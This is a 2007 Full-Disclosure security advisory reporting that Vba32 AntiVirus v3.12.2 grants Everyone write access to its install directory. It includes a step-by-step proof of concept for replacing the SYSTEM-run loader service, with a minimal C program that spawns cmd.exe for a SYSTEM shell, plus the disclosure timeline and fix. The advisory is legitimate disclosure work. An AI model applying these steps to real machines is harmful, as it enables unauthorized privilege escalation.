========================================================================= Team Intell Security Advisory TISA2007-12-Private ------------------------------------------------------------------------- Vba32 AntiVirus v3.12.2 insecure file permissions ========================================================================= Release date: 04.10.2007 Severity: Moderately critical Impact: Privilege escalation Remote: No Status: Official patch available Software: Vba32 AntiVirus v3.12.2 Tested on: Microsoft Windows XP SP2 Vendor: http://www.anti-virus.by/en/ Disclosed by: Edi Strosar (Team Intell) Vendor's description of affected application: ============================================= "Antivirus program for personal computers running Windows which is a reliable and, it is crucial, quick tool to detect and neutralize computer viruses, mail worms, trojan programs and other malware (backdoors, adware, spyware, etc) in real time and by request." Download link: http://www.anti-virus.by/en/personal.html Analysis: ========= Vba32 AntiVirus v3.12.2 is prone to security issue which can be exploited by LUA users to gain escalated privileges. The problem is caused due to the application setting insecure default permissions (grants Everyone:Write access) on the Vba32 installation directory and all it's child objects. This can be exploited to remove, manipulate, and replace any of the application's files. Successful exploitation allows execution of arbitrary code with SYSTEM privileges. Proof of concept: ================= - logon as LUA user - rename vba32ldr.exe to vba32ldr.exe.BAK - copy program.exe to Vba32 installation directory - rename program.exe to vba32ldr.exe - restart the computer - "rootshell" ;) Note: vba32ldr.exe is Vba32 Loader Service that runs as NT AUTHORITY\SYSTEM. Tested on Vba32 AntiVirus v3.12.2. Other versions may be affected. Source code for program.exe: ============================ #include int main() { system("cmd.exe"); return 0; } Solution: ========= Set proper permissions on the Vba32 installation directory and all it's child objects. NOTE: this may impact the functionality. Timeline: ========= 10.08.2007 - initial vendor notification 11.08.2007 - initial vendor response 22.08.2007 - additional vendor notification 27.08.2007 - additional vendor response 24.09.2007 - patch released 04.10.2007 - public disclosure Contact: ======== Maldin d.o.o. Trzaska cesta 2 1000 Ljubljana - SI tel: +386 (0)590 70 170 fax: +386 (0)590 70 177 gsm: +386 (0)31 816 400 web: www.teamintell.com e-mail: info@teamintell.com Disclaimer: =========== The content of this report is purely informational and meant for educational purposes only. Maldin d.o.o. shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk. ========================================================================= _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/